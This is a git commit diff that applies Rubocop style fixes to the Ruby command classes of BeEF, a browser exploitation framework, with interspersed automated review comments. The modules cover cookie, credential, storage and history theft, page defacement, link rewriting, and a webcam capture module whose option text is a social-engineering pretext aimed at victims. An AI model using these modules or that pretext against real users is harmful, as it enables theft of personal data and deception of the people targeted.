Modules: Resolve many Rubocop violations

Brendan Coles
2022-01-22 12:46:42 +00:00
parent bbe805f017
commit a64480dfab
317 changed files with 3238 additions and 3965 deletions


@@ -14,20 +14,13 @@
# limitations under the License.
#
class Avant_steal_history < BeEF::Core::Command
def self.options
[
{ 'name' => 'cId', 'ui_label' => 'Command ID', 'value' => '60003', 'type' => 'textarea', 'width' => '400px', 'height' => '25px' }
]
end
def self.options
configuration = BeEF::Core::Configuration.instance
return [
{'name' => 'cId', 'ui_label' => 'Command ID', 'value' => '60003', 'type' => 'textarea', 'width' => '400px', 'height' => '25px' }
]
end
def post_execute
save({'result' => @datastore['result']})
end
def post_execute
save({ 'result' => @datastore['result'] })
end
end


@@ -7,15 +7,11 @@
# http://www.itsecuritysolutions.org/2010-03-29_fingerprinting_browsers_using_protocol_handlers/
class Browser_fingerprinting < BeEF::Core::Command
def post_execute
content = {}
content['browser_type'] = @datastore['browser_type'] if not @datastore['browser_type'].nil?
content['browser_version'] = @datastore['browser_version'] if not @datastore['browser_version'].nil?
if content.empty?
content['fail'] = 'Failed to fingerprint browser.'
end
content['browser_type'] = @datastore['browser_type'] unless @datastore['browser_type'].nil?
content['browser_version'] = @datastore['browser_version'] unless @datastore['browser_version'].nil?
content['fail'] = 'Failed to fingerprint browser.' if content.empty?
save content
end
end


@@ -4,14 +4,14 @@
# See the file 'doc/COPYING' for copying permission
#
class Detect_activex < BeEF::Core::Command
def post_execute
content = {}
content['activex'] = @datastore['activex']
save content
def post_execute
content = {}
content['activex'] = @datastore['activex']
save content
if @datastore['results'] =~ /^activex=(Yes|No)/
bd = BeEF::Core::Models::BrowserDetails.set(@datastore['beefhook'], 'browser.capabilities.activex', $1)
end
end
activex = @datastore['results'].scan(/^activex=(Yes|No)/).flatten.first
return unless activex
BeEF::Core::Models::BrowserDetails.set(@datastore['beefhook'], 'browser.capabilities.activex', activex)
end
end
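Review bot: The rewritten lookup calls `.scan` on `@datastore['results']` with no nil guard, so a response without a `results` field would raise NoMethodError in `post_execute`, whereas the earlier `=~` form simply failed to match on nil. The value is reported by the hooked browser and should be handled as untrusted input; `activex = @datastore['results'].to_s[/\Aactivex=(Yes|No)/, 1]` keeps the early return and is nil-safe. The `^` anchor matches at the start of any line rather than the start of the string, so `\A` is the stricter choice if the result is expected to be a single `key=value` string; the same `^`-anchored pattern appears in the Detect_foxit, Detect_office, Detect_vlc and Detect_wmp sections. The +/- markers are lost on this page, so which lines form the new side is inferred from the style of the rewrite.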


@@ -4,11 +4,9 @@
# See the file 'doc/COPYING' for copying permission
#
class Detect_evernote_clipper < BeEF::Core::Command
def post_execute
content = {}
content['evernote_clipper'] = @datastore['evernote_clipper'] if not @datastore['evernote_clipper'].nil?
save content
end
def post_execute
content = {}
content['evernote_clipper'] = @datastore['evernote_clipper'] unless @datastore['evernote_clipper'].nil?
save content
end
end


@@ -8,12 +8,9 @@
# http://jeremiahgrossman.blogspot.fr/2006/08/i-know-what-youve-got-firefox.html
#
class Detect_extensions < BeEF::Core::Command
def post_execute
content = {}
content['extension'] = @datastore['extension']
save content
end
end


@@ -4,11 +4,9 @@
# See the file 'doc/COPYING' for copying permission
#
class Detect_firebug < BeEF::Core::Command
def post_execute
content = {}
content['firebug'] = @datastore['firebug'] if not @datastore['firebug'].nil?
save content
end
def post_execute
content = {}
content['firebug'] = @datastore['firebug'] unless @datastore['firebug'].nil?
save content
end
end


@@ -4,14 +4,10 @@
# See the file 'doc/COPYING' for copying permission
#
class Detect_foxit < BeEF::Core::Command
def post_execute
content = {}
content['foxit'] = @datastore['foxit']
save content
if @datastore['results'] =~ /^foxit=(Yes|No)/
bd = BeEF::Core::Models::BrowserDetails.set(@datastore['beefhook'], 'HasFoxit', $1)
end
end
def post_execute
content = {}
content['foxit'] = @datastore['foxit']
save content
BeEF::Core::Models::BrowserDetails.set(@datastore['beefhook'], 'HasFoxit', Regexp.last_match(1)) if @datastore['results'] =~ /^foxit=(Yes|No)/
end
end


@@ -4,11 +4,9 @@
# See the file 'doc/COPYING' for copying permission
#
class Detect_lastpass < BeEF::Core::Command
def post_execute
content = {}
content['lastpass'] = @datastore['lastpass'] if not @datastore['lastpass'].nil?
save content
end
def post_execute
content = {}
content['lastpass'] = @datastore['lastpass'] unless @datastore['lastpass'].nil?
save content
end
end


@@ -4,14 +4,10 @@
# See the file 'doc/COPYING' for copying permission
#
class Detect_office < BeEF::Core::Command
def post_execute
content = {}
content['office'] = @datastore['office']
save content
if @datastore['results'] =~ /^office=Office (\d+|Xp)/
bd = BeEF::Core::Models::BrowserDetails.set(@datastore['beefhook'], 'HasOffice', $1)
end
end
def post_execute
content = {}
content['office'] = @datastore['office']
save content
BeEF::Core::Models::BrowserDetails.set(@datastore['beefhook'], 'HasOffice', Regexp.last_match(1)) if @datastore['results'] =~ /^office=Office (\d+|Xp)/
end
end


@@ -4,11 +4,9 @@
# See the file 'doc/COPYING' for copying permission
#
class Detect_popup_blocker < BeEF::Core::Command
def post_execute
content = {}
content['popup_blocker_enabled'] = @datastore['popup_blocker_enabled']
save content
end
end


@@ -4,11 +4,9 @@
# See the file 'doc/COPYING' for copying permission
#
class Detect_quicktime < BeEF::Core::Command
def post_execute
content = {}
content['quicktime'] = @datastore['quicktime']
save content
end
def post_execute
content = {}
content['quicktime'] = @datastore['quicktime']
save content
end
end


@@ -4,11 +4,9 @@
# See the file 'doc/COPYING' for copying permission
#
class Detect_realplayer < BeEF::Core::Command
def post_execute
content = {}
content['realplayer'] = @datastore['realplayer']
save content
end
def post_execute
content = {}
content['realplayer'] = @datastore['realplayer']
save content
end
end


@@ -4,11 +4,9 @@
# See the file 'doc/COPYING' for copying permission
#
class Detect_silverlight < BeEF::Core::Command
def post_execute
content = {}
content['silverlight'] = @datastore['silverlight']
save content
end
def post_execute
content = {}
content['silverlight'] = @datastore['silverlight']
save content
end
end


@@ -3,12 +3,10 @@
# Browser Exploitation Framework (BeEF) - http://beefproject.com
# See the file 'doc/COPYING' for copying permission
#
class Detect_simple_adblock< BeEF::Core::Command
def post_execute
content = {}
content['simple_adblock'] = @datastore['simple_adblock'] if not @datastore['simple_adblock'].nil?
save content
end
class Detect_simple_adblock < BeEF::Core::Command
def post_execute
content = {}
content['simple_adblock'] = @datastore['simple_adblock'] unless @datastore['simple_adblock'].nil?
save content
end
end


@@ -4,11 +4,9 @@
# See the file 'doc/COPYING' for copying permission
#
class Detect_toolbars < BeEF::Core::Command
def post_execute
content = {}
content['toolbars'] = @datastore['toolbars']
save content
end
end
end


@@ -4,11 +4,9 @@
# See the file 'doc/COPYING' for copying permission
#
class Detect_unity < BeEF::Core::Command
def post_execute
content = {}
content['unity'] = @datastore['unity']
save content
end
end


@@ -4,11 +4,9 @@
# See the file 'doc/COPYING' for copying permission
#
class Detect_unsafe_activex < BeEF::Core::Command
def post_execute
content = {}
content['unsafe_activex'] = @datastore['unsafe_activex']
save content
end
def post_execute
content = {}
content['unsafe_activex'] = @datastore['unsafe_activex']
save content
end
end


@@ -4,14 +4,10 @@
# See the file 'doc/COPYING' for copying permission
#
class Detect_vlc < BeEF::Core::Command
def post_execute
content = {}
content['vlc'] = @datastore['vlc']
save content
if @datastore['results'] =~ /^vlc=(Yes|No)/
bd = BeEF::Core::Models::BrowserDetails.set(@datastore['beefhook'], 'browser.capabilities.vlc', $1)
end
BeEF::Core::Models::BrowserDetails.set(@datastore['beefhook'], 'browser.capabilities.vlc', Regexp.last_match(1)) if @datastore['results'] =~ /^vlc=(Yes|No)/
end
end


@@ -4,14 +4,10 @@
# See the file 'doc/COPYING' for copying permission
#
class Detect_wmp < BeEF::Core::Command
def post_execute
content = {}
content['wmp'] = @datastore['wmp']
save content
if @datastore['results'] =~ /^wmp=(Yes|No)/
bd = BeEF::Core::Models::BrowserDetails.set(@datastore['beefhook'], 'browser.capabilities.wmp', $1)
end
end
def post_execute
content = {}
content['wmp'] = @datastore['wmp']
save content
BeEF::Core::Models::BrowserDetails.set(@datastore['beefhook'], 'browser.capabilities.wmp', Regexp.last_match(1)) if @datastore['results'] =~ /^wmp=(Yes|No)/
end
end


@@ -5,15 +5,11 @@
#
class Fingerprint_browser < BeEF::Core::Command
def post_execute
content = {}
content['fingerprint'] = @datastore['fingerprint'] unless @datastore['fingerprint'].nil?
content['components'] = @datastore['components'] unless @datastore['components'].nil?
if content.empty?
content['fail'] = 'Failed to fingerprint browser.'
end
content['fail'] = 'Failed to fingerprint browser.' if content.empty?
save content
end
end


@@ -5,11 +5,10 @@
#
class Get_visited_domains < BeEF::Core::Command
def self.options
return [{
'name' => 'domains',
'description' => 'Specify additional resources to fetch during visited domains analysis. Paste to the below field full URLs leading to CSS, image, JS or other *static* resources hosted on desired page. Separate domain names with url by using semicolon (;). Next domains separate by comma (,).',
[{
'name' => 'domains',
'description' => 'Specify additional resources to fetch during visited domains analysis. Paste to the below field full URLs leading to CSS, image, JS or other *static* resources hosted on desired page. Separate domain names with url by using semicolon (;). Next domains separate by comma (,).',
'type' => 'textarea',
'ui_label' => 'Specify custom page to check',
'value' => 'Github ; https://assets-cdn.github.com/favicon.ico,',
@@ -23,5 +22,4 @@ class Get_visited_domains < BeEF::Core::Command
content['results'] = @datastore['results']
save content
end
end


@@ -4,20 +4,18 @@
# See the file 'doc/COPYING' for copying permission
#
class Get_visited_urls < BeEF::Core::Command
def self.options
return [
{ 'ui_label'=>'URL(s)',
'name'=>'urls',
'description' => 'Enter target URL(s)',
'type'=>'textarea',
'value'=>'http://beefproject.com/',
'width'=>'200px' }
[
{ 'ui_label' => 'URL(s)',
'name' => 'urls',
'description' => 'Enter target URL(s)',
'type' => 'textarea',
'value' => 'http://beefproject.com/',
'width' => '200px' }
]
end
def post_execute
save({'result' => @datastore['result']})
save({ 'result' => @datastore['result'] })
end
end


@@ -5,14 +5,10 @@
#
class Ajax_fingerprint < BeEF::Core::Command
def post_execute
content = {}
content['script_urls'] = @datastore['script_urls'] if not @datastore['script_urls'].nil?
if content.empty?
content['fail'] = 'Failed to fingerprint ajax.'
end
save content
content = {}
content['script_urls'] = @datastore['script_urls'] unless @datastore['script_urls'].nil?
content['fail'] = 'Failed to fingerprint ajax.' if content.empty?
save content
end
end


@@ -4,23 +4,21 @@
# See the file 'doc/COPYING' for copying permission
#
class Alert_dialog < BeEF::Core::Command
# set and return all options for this module
# set and return all options for this module
def self.options
return [{
'name' => 'text',
'description' => 'Sends an alert dialog to the victim',
[{
'name' => 'text',
'description' => 'Sends an alert dialog to the victim',
'type' => 'textarea',
'ui_label' => 'Alert text',
'value' => 'BeEF Alert Dialog',
'width' => '400px'
}]
'width' => '400px'
}]
end
def post_execute
def post_execute
content = {}
content['User Response'] = "The user clicked the 'OK' button when presented with an alert box."
save content
end
end


@@ -4,16 +4,15 @@
# See the file 'doc/COPYING' for copying permission
#
class Apache_tomcat_examples_cookie_disclosure < BeEF::Core::Command
def self.options
[
{'name' => 'request_header_servlet_path', 'ui_label' => "'Request Header Example' path", 'value' => '/examples/servlets/servlet/RequestHeaderExample'},
{ 'name' => 'request_header_servlet_path', 'ui_label' => "'Request Header Example' path", 'value' => '/examples/servlets/servlet/RequestHeaderExample' }
]
end
def post_execute
content = {}
content['cookies'] = @datastore['cookies']
save content
end
def post_execute
content = {}
content['cookies'] = @datastore['cookies']
save content
end
end


@@ -4,11 +4,9 @@
# See the file 'doc/COPYING' for copying permission
#
class Clear_console < BeEF::Core::Command
def post_execute
content = {}
content['result'] = @datastore['result']
save content
end
end


@@ -4,19 +4,20 @@
# See the file 'doc/COPYING' for copying permission
#
class Deface_web_page < BeEF::Core::Command
def self.options
@configuration = BeEF::Core::Configuration.instance
proto = @configuration.beef_proto
beef_host = @configuration.beef_host
beef_port = @configuration.beef_port
base_host = "#{proto}://#{beef_host}:#{beef_port}"
@configuration = BeEF::Core::Configuration.instance
proto = @configuration.beef_proto
beef_host = @configuration.beef_host
beef_port = @configuration.beef_port
base_host = "#{proto}://#{beef_host}:#{beef_port}"
favicon_uri = "#{base_host}/ui/media/images/favicon.ico"
return [
{ 'name' => 'deface_title', 'description' => 'Page Title', 'ui_label' => 'New Title', 'value' => 'BeEF - The Browser Exploitation Framework Project', 'width'=>'200px' },
{ 'name' => 'deface_favicon', 'description' => 'Shortcut Icon', 'ui_label' => 'New Favicon', 'value' => favicon_uri, 'width'=>'200px' },
{ 'name' => 'deface_content', 'description' => 'Your defacement content', 'ui_label'=>'Deface Content', 'type' => 'textarea', 'value' =>'BeEF!', 'width' => '400px', 'height' => '100px' }
favicon_uri = "#{base_host}/ui/media/images/favicon.ico"
[
{ 'name' => 'deface_title', 'description' => 'Page Title', 'ui_label' => 'New Title', 'value' => 'BeEF - The Browser Exploitation Framework Project',
'width' => '200px' },
{ 'name' => 'deface_favicon', 'description' => 'Shortcut Icon', 'ui_label' => 'New Favicon', 'value' => favicon_uri, 'width' => '200px' },
{ 'name' => 'deface_content', 'description' => 'Your defacement content', 'ui_label' => 'Deface Content', 'type' => 'textarea', 'value' => 'BeEF!', 'width' => '400px',
'height' => '100px' }
]
end
@@ -24,7 +25,5 @@ class Deface_web_page < BeEF::Core::Command
content = {}
content['Result'] = @datastore['result']
save content
end
end
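Review bot: `self.options` still assigns `@configuration`, a class-level instance variable, on every call although the value is only read inside the method; a local such as `configuration = BeEF::Core::Configuration.instance` would avoid leaving shared state on the class. The same protocol/host/port interpolation is repeated in the Get_stored_credentials, Site_redirect_iframe and Play_sound sections, so a single helper that returns the base URL, with a one-line comment on where the values come from, would keep the four modules consistent. The `post_execute` body in the second hunk starts outside the visible lines.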


@@ -4,11 +4,11 @@
# See the file 'doc/COPYING' for copying permission
#
class Deface_web_page_component < BeEF::Core::Command
def self.options
return [
{ 'name' => 'deface_selector', 'description' => 'The jQuery Selector to rewrite', 'ui_label' => 'Target Selector (Using jQuery\'s selector notation)', 'value' => '.headertitle', 'width'=>'200px' },
{ 'name' => 'deface_content', 'description' => 'The HTML to replace within the target', 'ui_label' => 'Deface Content', 'value' => 'BeEF was ere', 'width'=>'200px' }
[
{ 'name' => 'deface_selector', 'description' => 'The jQuery Selector to rewrite', 'ui_label' => 'Target Selector (Using jQuery\'s selector notation)', 'value' => '.headertitle',
'width' => '200px' },
{ 'name' => 'deface_content', 'description' => 'The HTML to replace within the target', 'ui_label' => 'Deface Content', 'value' => 'BeEF was ere', 'width' => '200px' }
]
end
@@ -16,7 +16,5 @@ class Deface_web_page_component < BeEF::Core::Command
content = {}
content['Result'] = @datastore['result']
save content
end
end


@@ -4,11 +4,9 @@
# See the file 'doc/COPYING' for copying permission
#
class Disable_developer_tools < BeEF::Core::Command
def post_execute
content = {}
content['result'] = @datastore['result']
save content
end
end


@@ -4,14 +4,13 @@
# See the file 'doc/COPYING' for copying permission
#
class Get_autocomplete_creds < BeEF::Core::Command
def self.options
[]
end
def self.options
[]
end
def post_execute
content = {}
content['results'] = @datastore['results']
save content
end
def post_execute
content = {}
content['results'] = @datastore['results']
save content
end
end


@@ -4,11 +4,9 @@
# See the file 'doc/COPYING' for copying permission
#
class Get_cookie < BeEF::Core::Command
def post_execute
content = {}
content['cookie'] = @datastore['cookie']
save content
end
end


@@ -4,11 +4,9 @@
# See the file 'doc/COPYING' for copying permission
#
class Get_form_values < BeEF::Core::Command
def post_execute
content = {}
content['result'] = @datastore['result']
save content
end
def post_execute
content = {}
content['result'] = @datastore['result']
save content
end
end


@@ -4,16 +4,14 @@
# See the file 'doc/COPYING' for copying permission
#
class Get_local_storage < BeEF::Core::Command
# More info:
# http://dev.w3.org/html5/webstorage/
# http://diveintohtml5.org/storage.html
#
def post_execute
content = {}
content['localStorage'] = @datastore['localStorage']
save content
end
end


@@ -4,12 +4,10 @@
# See the file 'doc/COPYING' for copying permission
#
class Get_page_html < BeEF::Core::Command
def post_execute
content = {}
content['head'] = @datastore['head']
content['body'] = @datastore['body']
save content
end
end


@@ -4,7 +4,6 @@
# See the file 'doc/COPYING' for copying permission
#
class Get_page_html_iframe < BeEF::Core::Command
def post_execute
content = {}
content['head'] = @datastore['head']
@@ -12,5 +11,4 @@ class Get_page_html_iframe < BeEF::Core::Command
content['iframe_'] = @datastore['iframe_']
save content
end
end


@@ -4,12 +4,10 @@
# See the file 'doc/COPYING' for copying permission
#
class Get_page_links < BeEF::Core::Command
def post_execute
content = {}
content['links'] = @datastore['links']
save content
end
end


@@ -4,16 +4,14 @@
# See the file 'doc/COPYING' for copying permission
#
class Get_session_storage < BeEF::Core::Command
# More info:
# http://dev.w3.org/html5/webstorage/
# http://diveintohtml5.org/storage.html
#
def post_execute
content = {}
content['sessionStorage'] = @datastore['sessionStorage']
save content
end
end


@@ -4,24 +4,22 @@
# See the file 'doc/COPYING' for copying permission
#
class Get_stored_credentials < BeEF::Core::Command
def self.options
@configuration = BeEF::Core::Configuration.instance
proto = @configuration.beef_proto
beef_host = @configuration.beef_host
beef_port = @configuration.beef_port
base_host = "#{proto}://#{beef_host}:#{beef_port}"
def self.options
@configuration = BeEF::Core::Configuration.instance
proto = @configuration.beef_proto
beef_host = @configuration.beef_host
beef_port = @configuration.beef_port
base_host = "#{proto}://#{beef_host}:#{beef_port}"
uri = "#{base_host}/demos/butcher/index.html"
return [
{ 'name' => 'login_url', 'description' => 'Login URL', 'ui_label' => 'Login URL', 'value' => uri, 'width'=>'400px' }
]
end
def post_execute
content = {}
content['form_data'] = @datastore['form_data']
save content
end
uri = "#{base_host}/demos/butcher/index.html"
[
{ 'name' => 'login_url', 'description' => 'Login URL', 'ui_label' => 'Login URL', 'value' => uri, 'width' => '400px' }
]
end
def post_execute
content = {}
content['form_data'] = @datastore['form_data']
save content
end
end


@@ -4,15 +4,13 @@
# See the file 'doc/COPYING' for copying permission
#
class Link_rewrite < BeEF::Core::Command
def self.options
return [
{ 'ui_label'=>'URL', 'name'=>'url', 'description' => 'Target URL', 'value'=>'http://beefproject.com/', 'width'=>'200px' }
[
{ 'ui_label' => 'URL', 'name' => 'url', 'description' => 'Target URL', 'value' => 'http://beefproject.com/', 'width' => '200px' }
]
end
def post_execute
save({'result' => @datastore['result']})
save({ 'result' => @datastore['result'] })
end
end


@@ -4,15 +4,13 @@
# See the file 'doc/COPYING' for copying permission
#
class Link_rewrite_click_events < BeEF::Core::Command
def self.options
return [
{ 'ui_label'=>'URL', 'name'=>'url', 'description' => 'Target URL', 'value'=>'http://beefproject.com/', 'width'=>'200px' }
[
{ 'ui_label' => 'URL', 'name' => 'url', 'description' => 'Target URL', 'value' => 'http://beefproject.com/', 'width' => '200px' }
]
end
def post_execute
save({'result' => @datastore['result']})
save({ 'result' => @datastore['result'] })
end
end


@@ -4,9 +4,7 @@
# See the file 'doc/COPYING' for copying permission
#
class Link_rewrite_sslstrip < BeEF::Core::Command
def post_execute
save({'result' => @datastore['result']})
save({ 'result' => @datastore['result'] })
end
end


@@ -4,15 +4,13 @@
# See the file 'doc/COPYING' for copying permission
#
class Link_rewrite_tel < BeEF::Core::Command
def self.options
return [
{ 'ui_label'=>'Number', 'name'=>'tel_number', 'description' => 'New telephone number', 'value'=>'5558585', 'width'=>'200px' }
[
{ 'ui_label' => 'Number', 'name' => 'tel_number', 'description' => 'New telephone number', 'value' => '5558585', 'width' => '200px' }
]
end
def post_execute
save({'result' => @datastore['result']})
save({ 'result' => @datastore['result'] })
end
end


@@ -4,21 +4,18 @@
# See the file 'doc/COPYING' for copying permission
#
class Mobilesafari_address_spoofing < BeEF::Core::Command
def self.options
[
{ 'name' => 'fake_url', 'ui_label' => 'Fake URL', 'type' => 'text', 'value' => 'http://en.wikipedia.org/wiki/Beef' },
{ 'name' => 'real_url', 'ui_label' => 'Real URL', 'type' => 'text', 'value' => 'http://www.beefproject.com' },
{ 'name' => 'domselectah', 'ui_label' => 'jQuery Selector for Link rewriting. \'a\' will overwrite all links', 'type' => 'text', 'value' => 'a' }
]
end
def self.options
return [
{'name' => 'fake_url', 'ui_label' => 'Fake URL', 'type' => 'text', 'value' =>'http://en.wikipedia.org/wiki/Beef'},
{'name' => 'real_url', 'ui_label' => 'Real URL', 'type' => 'text', 'value' => 'http://www.beefproject.com'},
{'name' => 'domselectah', 'ui_label' => 'jQuery Selector for Link rewriting. \'a\' will overwrite all links', 'type' => 'text', 'value' => 'a'}
]
end
def post_execute
content = {}
content['results'] = @datastore['results']
content['query'] = @datastore['query']
save content
end
def post_execute
content = {}
content['results'] = @datastore['results']
content['query'] = @datastore['query']
save content
end
end


@@ -5,12 +5,12 @@
#
class Overflow_cookiejar < BeEF::Core::Command
def self.options
return [
{'name' => 'preserveCookies', 'type' => 'checkbox', 'ui_label' => 'Attempt to preserve all non-httpOnly cookies', 'checked' => 'true'}
]
end
def post_execute
save({'result' => @datastore['result']})
[
{ 'name' => 'preserveCookies', 'type' => 'checkbox', 'ui_label' => 'Attempt to preserve all non-httpOnly cookies', 'checked' => 'true' }
]
end
def post_execute
save({ 'result' => @datastore['result'] })
end
end


@@ -4,22 +4,19 @@
# See the file 'doc/COPYING' for copying permission
#
class Prompt_dialog < BeEF::Core::Command
def self.options
return [
{'name' =>'question', 'description' =>'Prompt text', 'ui_label'=>'Prompt text'}
[
{ 'name' => 'question', 'description' => 'Prompt text', 'ui_label' => 'Prompt text' }
]
end
#
# This method is being called when a zombie sends some
# data back to the framework.
#
def post_execute
# return if @datastore['answer']==''
# return if @datastore['answer']==''
save({'answer' => @datastore['answer']})
save({ 'answer' => @datastore['answer'] })
end
end


@@ -4,7 +4,6 @@
# See the file 'doc/COPYING' for copying permission
#
class Remove_stuck_iframes < BeEF::Core::Command
def post_execute
content = {}
content['head'] = @datastore['head']
@@ -12,5 +11,4 @@ class Remove_stuck_iframes < BeEF::Core::Command
content['iframe_'] = @datastore['iframe_']
save content
end
end


@@ -4,11 +4,10 @@
# See the file 'doc/COPYING' for copying permission
#
class Replace_video < BeEF::Core::Command
def self.options
return [
{'name' => 'youtube_id', 'ui_label' => 'YouTube Video ID', 'value' => 'XZ5TajZYW6Y', 'width'=>'150px'},
{'name' => 'jquery_selector', 'ui_label' => 'jQuery Selector', 'value' => 'embed', 'width'=>'150px'}
[
{ 'name' => 'youtube_id', 'ui_label' => 'YouTube Video ID', 'value' => 'XZ5TajZYW6Y', 'width' => '150px' },
{ 'name' => 'jquery_selector', 'ui_label' => 'jQuery Selector', 'value' => 'embed', 'width' => '150px' }
]
end
@@ -16,7 +15,5 @@ class Replace_video < BeEF::Core::Command
content = {}
content['Result'] = @datastore['result']
save content
end
end


@@ -4,12 +4,9 @@
# See the file 'doc/COPYING' for copying permission
#
class Rickroll < BeEF::Core::Command
def post_execute
content = {}
content['Result'] = @datastore['result']
save content
end
end


@@ -4,15 +4,14 @@
# See the file 'doc/COPYING' for copying permission
#
class Site_redirect < BeEF::Core::Command
def self.options
return [
{ 'ui_label'=>'Redirect URL', 'name'=>'redirect_url', 'description' => 'The URL the target will be redirected to.', 'value'=>'http://beefproject.com/', 'width'=>'200px' }
[
{ 'ui_label' => 'Redirect URL', 'name' => 'redirect_url', 'description' => 'The URL the target will be redirected to.', 'value' => 'http://beefproject.com/',
'width' => '200px' }
]
end
def post_execute
save({'result' => @datastore['result']})
save({ 'result' => @datastore['result'] })
end
end


@@ -4,29 +4,28 @@
# See the file 'doc/COPYING' for copying permission
#
class Site_redirect_iframe < BeEF::Core::Command
def self.options
@configuration = BeEF::Core::Configuration.instance
proto = @configuration.beef_proto
beef_host = @configuration.beef_host
beef_port = @configuration.beef_port
base_host = "#{proto}://#{beef_host}:#{beef_port}"
def self.options
@configuration = BeEF::Core::Configuration.instance
proto = @configuration.beef_proto
beef_host = @configuration.beef_host
beef_port = @configuration.beef_port
base_host = "#{proto}://#{beef_host}:#{beef_port}"
favicon_uri = "#{base_host}/ui/media/images/favicon.ico"
return [
{ 'name' => 'iframe_title', 'description' => 'Title of the iFrame', 'ui_label' => 'New Title', 'value' => 'BeEF - The Browser Exploitation Framework Project', 'width'=>'200px' },
{ 'name' => 'iframe_favicon', 'description' => 'Shortcut Icon', 'ui_label' => 'New Favicon', 'value' => favicon_uri, 'width'=>'200px' },
favicon_uri = "#{base_host}/ui/media/images/favicon.ico"
[
{ 'name' => 'iframe_title', 'description' => 'Title of the iFrame', 'ui_label' => 'New Title', 'value' => 'BeEF - The Browser Exploitation Framework Project',
'width' => '200px' },
{ 'name' => 'iframe_favicon', 'description' => 'Shortcut Icon', 'ui_label' => 'New Favicon', 'value' => favicon_uri, 'width' => '200px' },
{ 'name' => 'iframe_src', 'description' => 'Source of the iFrame', 'ui_label' => 'Redirect URL', 'value' => 'http://beefproject.com/', 'width'=>'200px' },
{ 'name' => 'iframe_timeout', 'description' => 'iFrame timeout', 'ui_label' => 'Timeout', 'value' => '3500', 'width'=>'150px' }
]
end
{ 'name' => 'iframe_src', 'description' => 'Source of the iFrame', 'ui_label' => 'Redirect URL', 'value' => 'http://beefproject.com/', 'width' => '200px' },
{ 'name' => 'iframe_timeout', 'description' => 'iFrame timeout', 'ui_label' => 'Timeout', 'value' => '3500', 'width' => '150px' }
]
end
# This method is being called when a hooked browser sends some
# data back to the framework.
#
def post_execute
save({'result' => @datastore['result']})
save({ 'result' => @datastore['result'] })
end
end


@@ -4,10 +4,8 @@
# See the file 'doc/COPYING' for copying permission
#
class Play_sound < BeEF::Core::Command
# set and return all options for this module
def self.options
@configuration = BeEF::Core::Configuration.instance
proto = @configuration.beef_proto
beef_host = @configuration.beef_host
@@ -16,20 +14,19 @@ class Play_sound < BeEF::Core::Command
sound_file_url = "#{base_host}/demos/sound.wav"
return [{
'name' => 'sound_file_uri',
[{
'name' => 'sound_file_uri',
'description' => 'The web accessible URI for the wave sound file.',
'ui_label' => 'Sound File Path',
'value' => sound_file_url,
'width' => '300px'
}]
'width' => '300px'
}]
end
def post_execute
def post_execute
content = {}
content['result'] = @datastore['result']
save content
content['result'] = @datastore['result']
save content
end
end


@@ -4,11 +4,9 @@
# See the file 'doc/COPYING' for copying permission
#
class Remove_hook_element < BeEF::Core::Command
def post_execute
content = {}
content["result"] = @datastore["result"] if not @datastore["result"].nil?
save content
end
def post_execute
content = {}
content['result'] = @datastore['result'] unless @datastore['result'].nil?
save content
end
end


@@ -4,11 +4,11 @@
# See the file 'doc/COPYING' for copying permission
#
class Spyder_eye < BeEF::Core::Command
def self.options
return [
{ 'ui_label'=>'Repeat', 'name'=>'repeat', 'description' => 'Number of snapshot to take.', 'value'=>'1', 'width'=>'80px' },
{ 'ui_label'=>'Delay', 'name'=>'delay', 'description' => 'Delay between taking each snapshot in ms. To low value may severily impact browser\'s performance.', 'value'=>'3000', 'width'=>'80px' },
[
{ 'ui_label' => 'Repeat', 'name' => 'repeat', 'description' => 'Number of snapshot to take.', 'value' => '1', 'width' => '80px' },
{ 'ui_label' => 'Delay', 'name' => 'delay', 'description' => 'Delay between taking each snapshot in ms. To low value may severily impact browser\'s performance.',
'value' => '3000', 'width' => '80px' }
]
end
@@ -16,23 +16,23 @@ class Spyder_eye < BeEF::Core::Command
BeEF::Core::NetworkStack::Handlers::AssetHandler.instance.bind('/modules/browser/spyder_eye/html2canvas.min.js', '/h2c', 'js')
end
def post_execute
def post_execute
content = {}
content['results'] = @datastore['results'] if not @datastore['results'].nil?
content['results'] = @datastore['results'] unless @datastore['results'].nil?
save content
# save screenshot file
begin
timestamp = Time.now.localtime.strftime("%Y-%m-%d_%H-%M-%S")
timestamp = Time.now.localtime.strftime('%Y-%m-%d_%H-%M-%S')
ip = BeEF::Core::Models::BrowserDetails.get(session_id, 'browser.ipaddress')
filename = "#{$home_dir}/screenshot_#{ip}_-_#{timestamp}_#{@datastore['cid']}.png"
File.open(filename, 'wb') do |file|
data = @datastore['results'].gsub(/^image=data:image\/(png|jpg);base64,/, "")
data = @datastore['results'].gsub(%r{^image=data:image/(png|jpg);base64,}, '')
file.write(Base64.decode64(data))
end
print_info("Browser screenshot saved to '#{filename}'")
BeEF::Core::Logger.instance.register("Zombie", "Browser screenshot saved to '#{filename}'")
rescue => e
BeEF::Core::Logger.instance.register('Zombie', "Browser screenshot saved to '#{filename}'")
rescue StandardError => e
print_error("Could not write screenshot file '#{filename}' - Exception: #{e.message}")
end


@@ -4,11 +4,9 @@
# See the file 'doc/COPYING' for copying permission
#
class Unhook < BeEF::Core::Command
def post_execute
content = {}
content["result"] = @datastore["result"] if not @datastore["result"].nil?
save content
end
def post_execute
content = {}
content['result'] = @datastore['result'] unless @datastore['result'].nil?
save content
end
end


@@ -6,49 +6,49 @@
require 'base64'
class Webcam_flash < BeEF::Core::Command
def pre_send
BeEF::Core::NetworkStack::Handlers::AssetHandler.instance.bind('/modules/browser/webcam_flash/takeit.swf', '/takeit', 'swf')
BeEF::Core::NetworkStack::Handlers::AssetHandler.instance.bind('/modules/browser/webcam_flash/swfobject.js', '/swfobject', 'js')
BeEF::Core::NetworkStack::Handlers::AssetHandler.instance.bind('/modules/browser/webcam_flash/takeit.swf', '/takeit', 'swf')
BeEF::Core::NetworkStack::Handlers::AssetHandler.instance.bind('/modules/browser/webcam_flash/swfobject.js', '/swfobject', 'js')
end
def self.options
configuration = BeEF::Core::Configuration.instance
social_engineering_title = "This website is using Adobe Flash"
social_engineering_text = "In order to work with the programming framework this website is using, you need to allow the Adobe Flash Player Settings. If you use the new Ajax and HTML5 features in conjunction with Adobe Flash Player, it will improve your user experience."
no_of_pictures = 20
interval = 1000
return [
{'name' => 'social_engineering_title',
'description' => 'The title that is shown to the victim.',
'ui_label' => 'Social Engineering Title',
'value' => social_engineering_title,
'width' => '100px' }, {
'name' => 'social_engineering_text',
'description' => 'The social engineering text you want to show to convince the user to click the Allow button.',
'ui_label' => 'Social Engineering Text',
'value' => social_engineering_text,
'width' => '300px',
'type' => 'textarea' }, {
